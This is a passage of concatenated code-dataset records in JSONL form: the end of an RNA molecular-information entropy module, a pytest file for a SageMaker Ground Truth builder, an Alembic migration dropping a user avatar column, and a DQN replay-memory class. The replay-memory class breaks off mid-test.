self.pairs:\n state_counts = self.get(pairs, state)\n if (sum(state_counts.values()) == 0):\n continue\n\n nsb_array = np.array(list(state_counts.values()) + [0] * (len(self.functions) - len(state_counts)))\n fg_entropy = -np.sum((nsb_array[nsb_array != 0] / nsb_array[nsb_array != 0].sum()) * np.log2(\n nsb_array[nsb_array != 0] / nsb_array[nsb_array != 0].sum()))\n if (sum(state_counts.values()) <= len(self.exact)):\n expected_bg_entropy = self.exact[sum(state_counts.values()) - 1]\n else:\n expected_bg_entropy = self.approx_expect(bg_entropy, len(self.functions),\n sum(state_counts.values()))\n\n if (expected_bg_entropy - fg_entropy < 0):\n info[pairs][state] = 0\n else:\n info[pairs][state] = expected_bg_entropy - fg_entropy\n\n height_class = {}\n for aa_class in state_counts:\n height_class[aa_class] = (state_counts[aa_class] / sum(state_counts.values())) / (\n self.functions[aa_class] / len(self))\n for aa_class in height_class:\n height_dict[pairs][state][aa_class] = height_class[aa_class] / sum(height_class.values())\n\n for singles in range(self.pos):\n for state in self.singles:\n state_counts = self.get([singles], state)\n if (sum(state_counts.values()) == 0):\n continue\n\n nsb_array = np.array(list(state_counts.values()) + [0] * (len(self.functions) - len(state_counts)))\n fg_entropy = -np.sum((nsb_array[nsb_array != 0] / nsb_array[nsb_array != 0].sum()) * np.log2(\n nsb_array[nsb_array != 0] / nsb_array[nsb_array != 0].sum()))\n if (sum(state_counts.values()) <= len(self.exact)):\n expected_bg_entropy = self.exact[sum(state_counts.values()) - 1]\n else:\n expected_bg_entropy = self.approx_expect(bg_entropy, len(self.functions),\n sum(state_counts.values()))\n\n if (expected_bg_entropy - fg_entropy < 0):\n info[singles][state] = 0\n else:\n info[singles][state] = expected_bg_entropy - fg_entropy\n\n height_class = {}\n for aa_class in state_counts:\n height_class[aa_class] = (state_counts[aa_class] / sum(state_counts.values())) / (\n self.functions[aa_class] / len(self))\n for aa_class in height_class:\n height_dict[singles][state][aa_class] = height_class[aa_class] / sum(height_class.values())\n\n return (info, height_dict)\n\n def calculate_entropy_inverse_MM(self):\n \"\"\"\n Calculate functional information for anit-determinates using Miller-Maddow estimator.\n \"\"\"\n info_inverse = defaultdict(lambda: defaultdict(float))\n height_dict_inverse = defaultdict(lambda: defaultdict(lambda: defaultdict(float)))\n inverse_functions = Counter()\n for aa_class in self.functions:\n inverse_functions[aa_class] = sum(self.functions.values()) / self.functions[aa_class]\n\n np_inverse_functions = np.array(list(inverse_functions.values()))\n bg_entropy = -np.sum((np_inverse_functions[np_inverse_functions != 0] / np_inverse_functions[\n np_inverse_functions != 0].sum()) * np.log2(\n np_inverse_functions[np_inverse_functions != 0] / np_inverse_functions[np_inverse_functions != 0].sum()))\n for pairs in self.basepairs:\n for state in self.pairs:\n state_counts = self.get(pairs, state)\n if (sum(state_counts.values()) == 0):\n continue\n if (not len(state_counts) == len(self.functions)):\n for function in self.functions:\n state_counts[function] += 1\n\n inverse_state_counts = Counter()\n for aa_class in state_counts:\n inverse_state_counts[aa_class] = sum(state_counts.values()) / state_counts[aa_class]\n\n nsb_array = np.array(list(inverse_state_counts.values()))\n fg_entropy = -np.sum((nsb_array[nsb_array != 0] / nsb_array[nsb_array != 0].sum()) * np.log2(\n nsb_array[nsb_array != 0] / nsb_array[nsb_array != 0].sum()))\n if (sum(state_counts.values()) <= len(self.inverse_exact)):\n expected_bg_entropy = self.inverse_exact[sum(state_counts.values()) - 1]\n else:\n expected_bg_entropy = self.approx_expect(bg_entropy, len(self.functions),\n sum(state_counts.values()))\n\n if (expected_bg_entropy - fg_entropy < 0):\n info_inverse[pairs][state] = 0\n else:\n info_inverse[pairs][state] = expected_bg_entropy - fg_entropy\n\n height_class = {}\n for aa_class in inverse_state_counts:\n height_class[aa_class] = (inverse_state_counts[aa_class] / sum(inverse_state_counts.values())) / (\n inverse_functions[aa_class] / sum(inverse_functions.values()))\n for aa_class in height_class:\n height_dict_inverse[pairs][state][aa_class] = height_class[aa_class] / sum(height_class.values())\n\n for singles in range(self.pos):\n for state in self.singles:\n state_counts = self.get([singles], state)\n if (sum(state_counts.values()) == 0):\n continue\n if (not len(state_counts) == len(self.functions)):\n for function in self.functions:\n state_counts[function] += 1\n\n inverse_state_counts = Counter()\n for aa_class in state_counts:\n inverse_state_counts[aa_class] = sum(state_counts.values()) / state_counts[aa_class]\n\n nsb_array = np.array(list(inverse_state_counts.values()))\n fg_entropy = -np.sum((nsb_array[nsb_array != 0] / nsb_array[nsb_array != 0].sum()) * np.log2(\n nsb_array[nsb_array != 0] / nsb_array[nsb_array != 0].sum()))\n if (sum(state_counts.values()) <= len(self.inverse_exact)):\n expected_bg_entropy = self.inverse_exact[sum(state_counts.values()) - 1]\n else:\n expected_bg_entropy = self.approx_expect(bg_entropy, len(self.functions),\n sum(state_counts.values()))\n\n if (expected_bg_entropy - fg_entropy < 0):\n info_inverse[singles][state] = 0\n else:\n info_inverse[singles][state] = expected_bg_entropy - fg_entropy\n\n height_class = {}\n for aa_class in inverse_state_counts:\n height_class[aa_class] = (inverse_state_counts[aa_class] / sum(inverse_state_counts.values())) / (\n inverse_functions[aa_class] / sum(inverse_functions.values()))\n for aa_class in height_class:\n height_dict_inverse[singles][state][aa_class] = height_class[aa_class] / sum(height_class.values())\n\n return (info_inverse, height_dict_inverse)\n\n def calculate_entropy_inverse_NSB(self):\n \"\"\"\n Calculate functional information for anit-determinates using NSB estimator.\n \"\"\"\n # for singles in range(self.pos):\n # for state in self.singles:\n # state_counts = self.get([singles], state)\n # for p in state_counts:\n # print(state_counts[p],\"state_counts[p]\")\n # print(state_counts[p].values(),\"state_counts[p]\")\n # if state_counts[p] == 0:\n # print(\"hmmmmmmm\")\n\n info_inverse = defaultdict(lambda: defaultdict(float))\n height_dict_inverse = defaultdict(lambda: defaultdict(lambda: defaultdict(float)))\n inverse_functions = Counter()\n for aa_class in self.functions:\n inverse_functions[aa_class] = sum(self.functions.values()) / self.functions[aa_class]\n\n np_inverse_functions = np.array(list(inverse_functions.values()))\n bg_entropy = -np.sum((np_inverse_functions[np_inverse_functions != 0] / np_inverse_functions[\n np_inverse_functions != 0].sum()) * np.log2(\n np_inverse_functions[np_inverse_functions != 0] / np_inverse_functions[np_inverse_functions != 0].sum()))\n for pairs in self.basepairs:\n for state in self.pairs:\n state_counts = self.get(pairs, state)\n if (sum(state_counts.values()) == 0):\n continue\n if (not len(state_counts) == len(self.functions)):\n for function in self.functions:\n state_counts[function] += 1\n\n inverse_state_counts = Counter()\n for aa_class in state_counts:\n inverse_state_counts[aa_class] = sum(state_counts.values()) / state_counts[aa_class]\n\n nsb_array = np.array(list(inverse_state_counts.values()))\n if (sum(state_counts.values()) <= len(self.inverse_exact)):\n expected_bg_entropy = self.inverse_exact[sum(state_counts.values()) - 1]\n fg_entropy = -np.sum((nsb_array[nsb_array != 0] / nsb_array[nsb_array != 0].sum()) * np.log2(\n nsb_array[nsb_array != 0] / nsb_array[nsb_array != 0].sum()))\n else:\n expected_bg_entropy = bg_entropy\n fg_entropy = nb.S(nb.make_nxkx(nsb_array, nsb_array.size), nsb_array.sum(), nsb_array.size)\n\n if (expected_bg_entropy - fg_entropy < 0):\n info_inverse[pairs][state] = 0\n else:\n info_inverse[pairs][state] = expected_bg_entropy - fg_entropy\n\n height_class = {}\n for aa_class in inverse_state_counts:\n height_class[aa_class] = (inverse_state_counts[aa_class] / sum(inverse_state_counts.values())) / (\n inverse_functions[aa_class] / sum(inverse_functions.values()))\n for aa_class in height_class:\n height_dict_inverse[pairs][state][aa_class] = height_class[aa_class] / sum(height_class.values())\n\n for singles in range(self.pos):\n for state in self.singles:\n state_counts = self.get([singles], state)\n if (sum(state_counts.values()) == 0):\n continue\n if (not len(state_counts) == len(self.functions)):\n for function in self.functions:\n state_counts[function] += 1\n\n inverse_state_counts = Counter()\n for aa_class in state_counts:\n inverse_state_counts[aa_class] = sum(state_counts.values()) / state_counts[aa_class]\n\n nsb_array = np.array(list(inverse_state_counts.values()))\n if (sum(state_counts.values()) <= len(self.inverse_exact)):\n expected_bg_entropy = self.inverse_exact[sum(state_counts.values()) - 1]\n fg_entropy = -np.sum((nsb_array[nsb_array != 0] / nsb_array[nsb_array != 0].sum()) * np.log2(\n nsb_array[nsb_array != 0] / nsb_array[nsb_array != 0].sum()))\n else:\n expected_bg_entropy = bg_entropy\n fg_entropy = nb.S(nb.make_nxkx(nsb_array, nsb_array.size), nsb_array.sum(), nsb_array.size)\n\n if (expected_bg_entropy - fg_entropy < 0):\n info_inverse[singles][state] = 0\n else:\n info_inverse[singles][state] = expected_bg_entropy - fg_entropy\n\n height_class = {}\n for aa_class in inverse_state_counts:\n height_class[aa_class] = (inverse_state_counts[aa_class] / sum(inverse_state_counts.values())) / (\n inverse_functions[aa_class] / sum(inverse_functions.values()))\n for aa_class in height_class:\n height_dict_inverse[singles][state][aa_class] = height_class[aa_class] / sum(height_class.values())\n\n return (info_inverse, height_dict_inverse)\n\n def calculate_prob_dist(self, types):\n\n kld_post_dist = defaultdict(lambda: defaultdict(lambda: defaultdict(float)))\n kld_prior_dist = defaultdict(float)\n functions_array = np.array(list(self.functions.values()))\n # add one to every function\n # make a list of functions\n\n for p in types:\n if p not in self.functions:\n kld_prior_dist[p] = 1 / (functions_array[functions_array != 0].sum() + len(types))\n else:\n kld_prior_dist[p] = (self.functions[p] + 1) / (functions_array[functions_array != 0].sum() + len(types))\n\n for singles in range(self.pos):\n for state in self.singles:\n state_counts = self.get([singles], state)\n for t in types:\n if t not in state_counts:\n state_counts[t] = 1\n else:\n state_counts[t] += 1\n\n # add the functions that does not exist in state-counts and set their value to one\n # the set of functions can be the union of functions from both species or make an array manually\n # for p in state_counts:\n # types[p] = 1 + state_counts[p]\n for p in state_counts:\n kld_post_dist[singles][state][p] = state_counts[p] / sum(state_counts.values())\n\n print(singles,\" \",state,\" \",kld_post_dist[singles][state],\"*****************>>>>>>>>>>>>>>>>>>>>>>>>>>>\")\n\n return (kld_prior_dist, kld_post_dist)\n\n def calculate_kld(self, prior1, prior2, post1, post2):\n\n # 2 is foreground\n # 1 is background\n # functions are taked from the backround! doesn't matter anymore\n\n # ratios will be saved here\n ratios = defaultdict(lambda: defaultdict(lambda: defaultdict(float)))\n\n kld_prior = 0 # defaultdict(float)\n kld_dic = defaultdict(lambda: defaultdict(float))\n # prior will never become zero cause we added one to frequency of each function\n for p in prior1:\n kld_prior += prior2[p] * np.log2(prior2[p] / prior1[p])\n\n for singles in range(self.pos):\n for state in self.singles:\n for p in post1[singles][state]:\n kld_dic[singles][state] += post2[singles][state][p] * np.log2(\n post2[singles][state][p] / post1[singles][state][p])\n\n ratios[singles][state][p] = (post2[singles][state][p] / prior2[p]) / (\n post1[singles][state][p] / prior1[p])\n kld_dic[singles][state] -= kld_prior\n # temporary ????????????????????????????????????????????????????????????????????????????\n if kld_dic[singles][state] < 0:\n kld_dic[singles][state] = 0\n\n # calculate KLD heights\n kldheights = defaultdict(lambda: defaultdict(lambda: defaultdict(float)))\n\n for single in range(self.pos):\n for state in self.singles:\n for p in post1[single][state]:\n kldheights[single][state][p] = kld_dic[single][state] * ratios[single][state][p] / sum(\n ratios[single][state].values())\n\n for single in range(self.pos):\n for state in self.singles:\n mysum = sum(kldheights[single][state].values())\n for p in kldheights[single][state]:\n if mysum != 0:\n kldheights[single][state][p] = kldheights[single][state][p] / mysum\n\n return kld_dic, kldheights\n\n def calculate_entropy_NSB(self):\n \"\"\"\n Calculate functional information using NSB estimator.\n \"\"\"\n info = defaultdict(lambda: defaultdict(float))\n height_dict = defaultdict(lambda: defaultdict(lambda: defaultdict(float)))\n\n functions_array = np.array(list(self.functions.values()))\n\n # print(functions_array,\"function_array\")\n # print(self.functions,\"self.function\")\n # print(self.functions.values(),\"self.functions.values\")\n bg_entropy = -np.sum(\n (functions_array[functions_array != 0] / functions_array[functions_array != 0].sum()) * np.log2(\n functions_array[functions_array != 0] / functions_array[functions_array != 0].sum()))\n for pairs in self.basepairs:\n for state in self.pairs:\n state_counts = self.get(pairs, state)\n if (sum(state_counts.values()) == 0):\n continue\n nsb_array = np.array(list(state_counts.values()) + [0] * (len(self.functions) - len(state_counts)))\n if (sum(state_counts.values()) <= len(self.exact)):\n expected_bg_entropy = self.exact[sum(state_counts.values()) - 1]\n fg_entropy = -np.sum((nsb_array[nsb_array != 0] / nsb_array[nsb_array != 0].sum()) * np.log2(\n nsb_array[nsb_array != 0] / nsb_array[nsb_array != 0].sum()))\n else:\n expected_bg_entropy = bg_entropy\n fg_entropy = nb.S(nb.make_nxkx(nsb_array, nsb_array.size), nsb_array.sum(), nsb_array.size)\n\n if (expected_bg_entropy - fg_entropy < 0):\n info[pairs][state] = 0\n else:\n info[pairs][state] = expected_bg_entropy - fg_entropy\n\n height_class = {}\n for aa_class in state_counts:\n height_class[aa_class] = (state_counts[aa_class] / sum(state_counts.values())) / (\n self.functions[aa_class] / len(self))\n for aa_class in height_class:\n height_dict[pairs][state][aa_class] = height_class[aa_class] / sum(height_class.values())\n\n for singles in range(self.pos):\n for state in self.singles:\n state_counts = self.get([singles], state)\n # print(state_counts,\"statecounts\")\n if (sum(state_counts.values()) == 0):\n continue\n nsb_array = np.array(list(state_counts.values()) + [0] * (len(self.functions) - len(state_counts)))\n # print(self.exact,\"self.exact\",len(self.exact))\n if (sum(state_counts.values()) <= len(self.exact)):\n expected_bg_entropy = self.exact[sum(state_counts.values()) - 1]\n fg_entropy = -np.sum((nsb_array[nsb_array != 0] / nsb_array[nsb_array != 0].sum()) * np.log2(\n nsb_array[nsb_array != 0] / nsb_array[nsb_array != 0].sum()))\n else:\n expected_bg_entropy = bg_entropy\n fg_entropy = nb.S(nb.make_nxkx(nsb_array, nsb_array.size), nsb_array.sum(), nsb_array.size)\n\n if (expected_bg_entropy - fg_entropy < 0):\n info[singles][state] = 0\n else:\n info[singles][state] = expected_bg_entropy - fg_entropy\n\n height_class = {}\n for aa_class in state_counts:\n height_class[aa_class] = (state_counts[aa_class] / sum(state_counts.values())) / (\n self.functions[aa_class] / len(self))\n\n for aa_class in height_class:\n height_dict[singles][state][aa_class] = height_class[aa_class] / sum(height_class.values())\n\n return (info, height_dict)\n\n def calculate_logoID_infos(self, info_1, info_2, pos, singles, pairs, basepairs):\n\n id_info12 = defaultdict(lambda: defaultdict(float))\n id_info21 = defaultdict(lambda: defaultdict(float))\n for k in range(pos):\n # id_info12[k] = {'A': 0, 'U': 0, 'G': 0, '-': 0, 'C': 0}\n # id_info21[k] = {'A': 0, 'U': 0, 'G': 0, '-': 0, 'C': 0}\n\n logo_1 = info_1[k]\n logo_2 = info_2[k]\n\n for c in singles:\n id_info21[k][c] = logo_2[c] - logo_1[c]\n if id_info21[k][c] < 0:\n id_info21[k][c] = 0\n\n id_info12[k][c] = logo_1[c] - logo_2[c]\n if id_info12[k][c] < 0:\n id_info12[k][c] = 0\n\n # print(k,\" : \",c,\" : \",id_info21[k][c],\"id_info21[k][c] singles\")\n # print()\n\n for k in basepairs:\n\n logo_1 = info_1[k]\n logo_2 = info_2[k]\n for c in pairs:\n\n id_info21[k][c] = logo_2[c] - logo_1[c]\n if id_info21[k][c] < 0:\n id_info21[k][c] = 0\n\n id_info12[k][c] = logo_1[c] - logo_2[c]\n if id_info12[k][c] < 0:\n id_info12[k][c] = 0\n # print(k, \" : \", c, \" : \", id_info21[k][c], \"id_info21[k][c] pairs\")\n # print()\n\n # # TODO: we might need to remove this:\n #\n # for k in range(pos):\n # for c in info_1[k]:\n # info_1[k][c] = id_info1[k][c]\n # info_2[k][c] = id_info2[k][c]\n\n return id_info12, id_info21 # info_1, info_2\n\n def calculate_logoID_heights(self, height_b, height_f, info, pos, singles, pairs, basepairs, type):\n # f - b\n id_height = defaultdict(lambda: defaultdict(lambda: defaultdict(float)))\n # add zero to all the functions that do not exist\n\n for single in range(pos):\n for state in singles:\n for p in height_f[single][state]:\n if p in height_b[single][state] and height_b[single][state][p] != 0:\n id_height[single][state][p] = (height_f[single][state][p] /\n height_b[single][state][p])\n else:\n id_height[single][state][p] = height_f[single][state][p]\n # there is nothing for state -\n summ = sum(id_height[single][state].values())\n for p in id_height[single][state]:\n if summ != 0:\n id_height[single][state][p] = id_height[single][state][p] * info[single][state] / summ\n else:\n # print(single, state, \" sum is zero!!!!!!!!!!!!!\")\n id_height[single][state][p] = 0\n\n for single in basepairs:\n for state in pairs:\n for p in height_f[single][state]:\n if p in height_b[single][state] and height_b[single][state][p] != 0:\n id_height[single][state][p] = (height_f[single][state][p] /\n height_b[single][state][p])\n else:\n id_height[single][state][p] = height_f[single][state][p]\n # there is nothing for state -\n summ = sum(id_height[single][state].values())\n for p in id_height[single][state]:\n if summ != 0:\n id_height[single][state][p] = id_height[single][state][p] * info[single][state] / summ\n else:\n # print(single, state, \" sum is zero in pairs !!!!!!!!!!!!!\")\n id_height[single][state][p] = 0\n\n for single in range(pos):\n for state in singles:\n mysum = sum(id_height[single][state].values())\n for p in id_height[single][state]:\n if mysum != 0:\n id_height[single][state][p] = id_height[single][state][p] / mysum\n\n for single in basepairs:\n for state in pairs:\n mysum = sum(id_height[single][state].values())\n for p in id_height[single][state]:\n if mysum != 0:\n id_height[single][state][p] = id_height[single][state][p] / mysum\n\n for single in basepairs:\n for state in pairs:\n for t in type:\n if t not in id_height[single][state]:\n id_height[single][state][t] = 0\n\n for single in range(pos):\n for state in singles:\n for t in type:\n if t not in id_height[single][state]:\n id_height[single][state][t] = 0\n # for single in range(pos):\n # for state in singles:\n # print(single, \" : \",state, \" : \", id_height[single][state],\" id_height[single][state][p]\")\n # print()\n # for single in basepairs:\n # for state in pairs:\n # print(single, \" : \", state, \" : \", id_height[single][state], \" id_height[basepairs][state][p]\")\n # print()\n\n # id_height2 = {}\n # for single in range(pos):\n # id_height2[single] = {}\n # for state in singles:\n # id_height2[single][state] = {}\n # for p in id_height[single][state]:\n # if id_height[single][state][p] != 0:\n # id_height2[single][state][p] = id_height[single][state][p]\n # print(id_height2[single][state], \"**************id_height2[single][state]*************\")\n\n return id_height\n\n def is_overlap(self, position):\n pass\n\n def add_sequence(self, function, seq):\n self.sequences.append(Seq(function, seq))\n # print(Seq(function, seq),\"dddddddddddddddddddddd\")\n self.functions[function] += 1\n self.pos = len(seq) # pos is equal to 72\n self.singles.update(seq) # this contains A U C G - N\n\n for x in self.basepairs:\n self.pairs.add(seq[x[0]] + seq[x[1]])\n\n def get(self, position, state): # state is A U C G -\n ret_counter = Counter()\n\n if (len(position) == 1):\n for x in self.sequences:\n if (x.seq[position[0]] == state[0]):\n ret_counter[x.function] += 1\n if (len(position) == 2):\n for x in self.sequences:\n if (x.seq[position[0]] == state[0] and x.seq[position[1]] == state[1]):\n ret_counter[x.function] += 1\n return ret_counter\n\n def get_functions(self):\n function_list = []\n for key, val in self.functions.items():\n function_list.extend([key] * val)\n return function_list\n\n def __len__(self):\n return len(self.sequences)\n","sub_path":"tsfm/MolecularInformation.py","file_name":"MolecularInformation.py","file_ext":"py","file_size_in_byte":93459,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"426618051","text":"import pytest\nfrom sagemaker_groundtruth.sagemaker_groundtruth_internal import SageMakerGroundTruthInternal\n\n\ndef test_instance_return():\n instance = SageMakerGroundTruthInternal.get_builder()\n assert instance != None \n assert isinstance(instance, SageMakerGroundTruthInternal)\n\ndef test_exception_not_found_raises():\n instance = SageMakerGroundTruthInternal.get_builder()\n with pytest.raises(Exception) as excinfo: \n instance.build()\n assert str(excinfo.value) == \"Value for 'job_name' not found\"\n\n@pytest.fixture()\ndef instance_object():\n return SageMakerGroundTruthInternal.get_builder() \\\n .with_job_name(\"job_name\") \\\n .with_labeling_team(\"labeling_team\") \\\n .with_preprocessing_lambda(\"lambda\") \\\n .with_postprocessing_lambda(\"lambda\") \\\n .with_attribute_name(\"attr\") \\\n .with_input_manifest_path(\"path\") \\\n .with_output_manifest_path(\"path\") \\\n .with_labeling_template_path(\"path\") \\\n .with_task_time_limit(\"limit\") \\\n .with_job_availability_time(\"limit\")\n\ndef test_exception_tag_wrong_type_raises(instance_object):\n with pytest.raises(Exception) as excinfo: \n instance_object.with_tags({}).build()\n assert str(excinfo.value) == \"Value for 'tags' not found\" \n\ndef test_exception_tag_empty_list_raises(instance_object):\n with pytest.raises(Exception) as excinfo: \n instance_object.with_tags([]).build()\n assert str(excinfo.value) == \"Value for 'tags' not found\"\n \ndef test_exception_tag_missing_odin_app_id_raises(instance_object):\n with pytest.raises(Exception) as excinfo: \n instance_object.with_tags([{'Key':'fake_key','Value':'fake_value'}]).build()\n assert str(excinfo.value) == \"Key 'odin_app_id' not found\"\n \ndef test_exception_tag_missing_odin_app_id_raises(instance_object):\n instance = instance_object.with_tags([{'Key':'odin_app_id','Value':'odin_value'}]).build()\n assert instance != None \n assert isinstance(instance, SageMakerGroundTruthInternal)\n\n\ndef test_excpetion_if_properties_are_wrong_raises(instance_object):\n with pytest.raises(Exception) as excinfo: \n instance_object.with_tags([{'Key':'odin_app_id','Value':'odin_value'}]).build().create_job()\n\n\n# for debugging\nif __name__ == \"__main__\":\n pytest.main([\"tests/unit/test_sagemakergroundtruth.py\", \"-s\"])","sub_path":"tests/unit/test_sagemakergroundtruth.py","file_name":"test_sagemakergroundtruth.py","file_ext":"py","file_size_in_byte":2365,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"134452041","text":"\"\"\"delete avata column from user\n\nRevision ID: 8f2d439931c5\nRevises: 3b8b51eb2e59\nCreate Date: 2021-08-20 15:37:09.622730\n\n\"\"\"\nfrom alembic import op\nimport sqlalchemy as sa\n\n\n# revision identifiers, used by Alembic.\nrevision = '8f2d439931c5'\ndown_revision = '3b8b51eb2e59'\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n with op.batch_alter_table('user', schema=None) as batch_op:\n batch_op.drop_column('avatar')\n\n # ### end Alembic commands ###\n\n\ndef downgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n with op.batch_alter_table('user', schema=None) as batch_op:\n batch_op.add_column(sa.Column('avatar', sa.BLOB(), nullable=True))\n\n # ### end Alembic commands ###\n","sub_path":"migrations/versions/8f2d439931c5_delete_avata_column_from_user.py","file_name":"8f2d439931c5_delete_avata_column_from_user.py","file_ext":"py","file_size_in_byte":795,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"420083118","text":"import numpy as np\nimport gym\nimport pdb\n\n# TODO: Add proper unittest\n\nclass Memory:\n \"\"\"Circular buffer for DQN memory reply.\"\"\"\n\n def __init__(self,\n max_len,\n batch_size,\n enable_pmr=False,\n initial_pmr_error=1000.0):\n \"\"\"\n Args:\n max_len: maximum capacity\n enable_pmr: if True, enable Marcins version of PMR\n initial_pmr_error: error for new samples, should be order of\n magnitude larger than max error during normal operation\n \"\"\"\n assert isinstance(max_len, int)\n assert max_len > 0\n\n self._max_len = max_len\n self._batch_size = batch_size\n self._enable_pmr = enable_pmr\n self._initial_pmr_error = initial_pmr_error\n\n self._curr_insert_ptr = 0\n self._curr_len = 0\n\n def set_state_action_spaces(self, state_space, action_space):\n \"\"\"Set state/action space descriptors\n Params:\n state_space: gym.spaces.Box (tested) or Discrete (not tested)\n action_space: gym.spaces.Box (not tested) or Discrete (tested)\n \"\"\"\n \n # These should be relaxed in the future to support more spaces,\n # possibly remove gym dependancy\n if not isinstance(state_space, gym.spaces.Box):\n raise ValueError('Only gym.spaces.Box state space supproted')\n if not isinstance(action_space, gym.spaces.Discrete):\n raise ValueError('Only gym.spaces.Discrete action space supported')\n\n assert state_space.shape is not None\n assert state_space.dtype is not None\n assert action_space.shape is not None\n assert action_space.shape is not None\n\n self._state_space = state_space\n self._action_space = action_space\n\n \n\n St_shape = [self._max_len] + list(state_space.shape)\n At_shape = [self._max_len] + list(action_space.shape)\n Rt_1_shape = [self._max_len]\n St_1_shape = [self._max_len] + list(state_space.shape)\n done_shape = [self._max_len]\n error_shape = [self._max_len]\n\n self._hist_St = np.zeros(St_shape, dtype=state_space.dtype)\n self._hist_At = np.zeros(At_shape, dtype=action_space.dtype)\n self._hist_Rt_1 = np.zeros(Rt_1_shape, dtype=float)\n self._hist_St_1 = np.zeros(St_1_shape, dtype=state_space.dtype)\n self._hist_done = np.zeros(done_shape, dtype=bool)\n self._hist_error = np.zeros(error_shape, dtype=float)\n\n self._log_every = None\n self._log_mem = None\n\n\n def append(self, St, At, Rt_1, St_1, done):\n \"\"\"Add one sample to memory, override oldest if max_len reached.\n\n Args:\n St - state\n At - action\n Rt_1 - reward\n St_1 - next state\n done - True if episode completed\n \"\"\"\n assert self._state_space is not None\n assert self._action_space is not None\n assert self._state_space.contains(St)\n assert self._action_space.contains(At)\n assert self._state_space.contains(St_1)\n\n self._hist_St[self._curr_insert_ptr] = St\n self._hist_At[self._curr_insert_ptr] = At\n self._hist_Rt_1[self._curr_insert_ptr] = Rt_1\n self._hist_St_1[self._curr_insert_ptr] = St_1\n self._hist_done[self._curr_insert_ptr] = done\n \n # arbitrary high def error\n self._hist_error[self._curr_insert_ptr] = self._initial_pmr_error\n\n #\n # increment insertion pointer, roll back if required \n #\n if self._curr_len < self._max_len:\n self._curr_len += 1\n\n self._curr_insert_ptr += 1 \n if self._curr_insert_ptr >= self._max_len:\n self._curr_insert_ptr = 0\n\n def _print_all(self):\n print()\n print('_hist_St')\n print(self._hist_St)\n\n print()\n print('_hist_At')\n print(self._hist_At)\n\n print()\n print('_hist_Rt_1')\n print(self._hist_Rt_1)\n\n print()\n print('_hist_St_1')\n print(self._hist_St_1)\n\n print()\n print('_hist_done')\n print(self._hist_done)\n\n def length(self):\n \"\"\"Number of samples in memory, 0 <= length <= max_len\"\"\"\n return self._curr_len\n\n def get_batch(self, batch_len=None):\n \"\"\"Sample batch of data, with repetition\n\n Args:\n batch_len: nb of samples to pick,\n defaults to value passed in constructor\n\n Returns:\n states, actions, rewards, next_states, done, indices\n Each returned element is np.ndarray with length == batch_len\n Last element 'indices' can be passed back update_errors() method\n \"\"\"\n assert self._state_space is not None\n assert self._action_space is not None\n assert self._curr_len > 0\n assert batch_len is None or batch_len > 0\n\n if batch_len is None:\n batch_len = self._batch_size\n\n if not self._enable_pmr:\n # np.random.randint much faster than np.random.sample (?)\n indices = np.random.randint(\n low=0, high=self._curr_len, size=batch_len, dtype=int)\n\n else:\n cdf = np.cumsum(self._hist_error+0.01)\n cdf = cdf / cdf[-1]\n values = np.random.rand(batch_len)\n indices = np.searchsorted(cdf, values)\n\n\n states = np.take(self._hist_St, indices, axis=0)\n actions = np.take(self._hist_At, indices, axis=0)\n rewards_1 = np.take(self._hist_Rt_1, indices, axis=0)\n states_1 = np.take(self._hist_St_1, indices, axis=0)\n dones = np.take(self._hist_done, indices, axis=0)\n\n return states, actions, rewards_1, states_1, dones, indices\n\n def update_errors(self, indices, errors):\n \"\"\"For PMR, update error values for specified indices.\n\n Example:\n memory = Memory(...)\n ... # add some data\n st, act, rew, st_1, done, indices = memory.get_batch(64)\n ... # train neural network\n ... # calculate error values for each element in batch\n ... # but do NOT modify memory in any way\n memory.update_errors(indices, np.abs(errors))\n \"\"\"\n assert self._state_space is not None\n assert self._action_space is not None\n assert isinstance(indices, np.ndarray)\n assert indices.ndim == 1\n assert len(indices) > 0\n assert isinstance(errors, np.ndarray)\n assert errors.ndim == 1\n assert len(indices) == len(errors)\n assert (errors > 0).all\n\n self._hist_error[indices] = errors\n\n def install_logger(self, logger, log_every):\n self._log_mem = logger\n self._log_every = log_every\n\n def log(self, episode, step, total_step):\n\n if self._log_mem is not None and not self._log_mem.is_initialized:\n self._log_mem.add_param('max_len', self._max_len)\n self._log_mem.add_param('enable_pmr', self._enable_pmr)\n self._log_mem.add_data_item('curr_size')\n self._log_mem.add_data_item('hist_St')\n self._log_mem.add_data_item('hist_At')\n self._log_mem.add_data_item('hist_Rt_1')\n self._log_mem.add_data_item('hist_St_1')\n self._log_mem.add_data_item('hist_done')\n self._log_mem.add_data_item('hist_error')\n\n #\n # Log Memory\n #\n if self._log_mem is not None and total_step % self._log_every == 0:\n\n ptr = self._curr_insert_ptr\n self._log_mem.append(\n episode, step, total_step,\n curr_size=self.length(),\n hist_St=np.concatenate((self._hist_St[ptr:], self._hist_St[0:ptr])),\n hist_At=np.concatenate((self._hist_At[ptr:], self._hist_At[0:ptr])),\n hist_Rt_1=np.concatenate((self._hist_Rt_1[ptr:], self._hist_Rt_1[0:ptr])),\n hist_St_1=np.concatenate((self._hist_St_1[ptr:], self._hist_St_1[0:ptr])),\n hist_done=np.concatenate((self._hist_done[ptr:], self._hist_done[0:ptr])),\n hist_error=np.concatenate((self._hist_error[ptr:], self._hist_error[0:ptr])) )\n \n\n\nif __name__ == '__main__':\n # this is old test-method\n\n mem = Memory(state_shape=(2, ),\n act_shape=(1, ),\n dtypes=(float, int, float, float, bool),\n max_len=10)\n\n i = 1\n mem.append(St=np.array([i, i], dtype=float),\n At=i, Rt_1=-i, St_1=np.array([i+1,i+1], dtype=float), done=False)\n res = mem.get_batch(3)\n print(res)\n\n i = 2\n mem.append(St=np.array([i, i], dtype=float),\n At=i, Rt_1=-i, St_1=np.array([i+1,i+1], dtype=float), done=False)\n res = mem.get_batch(3)\n print(res)\n\n i = 3\n mem.append(St=np.array([i, i], dtype=float),\n At=i, Rt_1=-i, St_1=np.array([i+1,i+1], dtype=float), done=False)\n res = mem.get_batch(3)\n print(res)\n\n\n for i in range(4, 12):\n mem.append(St=np.array([i, i], dtype=float),\n At=i, Rt_1=-i, St_1=np.array([i+1,i+1], dtype=float), done=False)\n\n i = 12\n 